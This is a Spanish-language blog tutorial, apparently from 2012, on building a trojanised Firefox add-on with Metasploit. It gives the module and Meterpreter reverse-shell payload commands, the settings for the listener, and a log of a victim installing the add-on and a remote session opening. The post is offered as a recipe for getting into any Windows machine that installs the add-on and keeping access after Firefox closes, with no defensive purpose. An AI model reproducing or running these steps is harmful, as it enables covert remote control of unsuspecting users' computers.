metasploit, corrupting firefox addon

Firefox supuso en su día un gran avance en los mavegadores web y llegó a ser de los mejores. A día de hoy todavía está entre los más utilizados, y aunque ahora ya es algo más habitual, en su momento, la idea de poder instalar addon's o complementos en el navegador, supuso una gran revolución. Cualquier persona podía crear uno de estos y dejarlo libre para la descarga (en formato xpi). Hoy voy a ensenar cómo poder crear muy fácilmente un pequeño addon para firefox que tras su instalación permita abrir una puerta al equipo Windows que lo instale. Para ello, como siempre, vamos a emplear metasploit.
msf> use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon)> set PAYLOAD windows/meterpreter/reverse_tcp
Tras cargar el exploit a usar y el payload a infectar, simplemente queda la configuración y que una víctima lo instale. Por supuesto, como payload podéis usar el que mejor se os adapte en cada ocasión, aquí en el ejemplo, empleo uno de los más sencillos y rápidos de configurar.
msf exploit(firefox_xpi_bootstrapped_addon)> show options

Module options (exploit/multi/browser/firefox_xpi_bootstrapped_addon):

Name           Setting     Required  Description
----           -------     --------  -----------
ADDONNAME      metasploit  yes       The addon name.
AutoUninstall  true        yes       Automatically uninstall the addon
SRVHOST        0.0.0.0     yes       The local host to listen on.
SRVPORT        8080        yes       The local port to listen on.
SSL            false       no        Negotiate SSL for connections
SSLCert                    no        Path to a custom SSL certificate
SSLVersion     SSL3        no        Specify the version of SSL
URIPATH                    no        The URI to use for this exploit

Payload options (windows/meterpreter/reverse_tcp):

Name      Setting  Required  Description
----      -------  --------  -----------
EXITFUNC  process  yes       Exit technique: thread, none, process
LHOST              yes       The listen address
LPORT     4444     yes       The listen port

Exploit target:

Id  Name
--  ----
1   Windows x86 (Native Payload)

msf exploit(firefox_xpi_bootstrapped_addon)> set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_xpi_bootstrapped_addon)> set ADDONNAME metasploit
ADDONNAME => metasploit
msf exploit(firefox_xpi_bootstrapped_addon)> set LHOST 192.168.1.33
LHOST => 192.198.1.33
Una vez configurado, lanzamos el exploit,
msf exploit(firefox_xpi_bootstrapped_addon)> exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:4444 
[*] Using URL: http://0.0.0.0:80/fIqnAArNPieCr
[*]  Local IP: http://192.168.1.33:80/fIqnAArNPieCr
[*] Server started.
Y ahora ya sólo queda que alguien visite la web de descarga de addon o se baje el xpi para que se nos abra una sesión contra la víctima. Cuando esto suceda, veremos algo similar a lo siguiente,
[*] 192.168.1.42 firefox_xpi_bootstrapped_addon - Handling request...
[*] 192.168.1.42 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] 192.168.1.42 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] Sending stage (752128 bytes) to 192.168.1.42
[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.42:1182) at Thu Jun 28 22:44:19 +0200 2012
Y tendremos una sesión abierta a la que podremos acceder aunque el equipo de la víctima cierre su firefox.
msf exploit(firefox_xpi_bootstrapped_addon)> show sessions

Active sessions
===============

Id  Type        Information  Connection
--  ----        -----------  ----------
1   meterpreter  WIN\Admin   192.168.1.33:4444 -> 192.168.1.42:1182 (192.168.1.42)


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios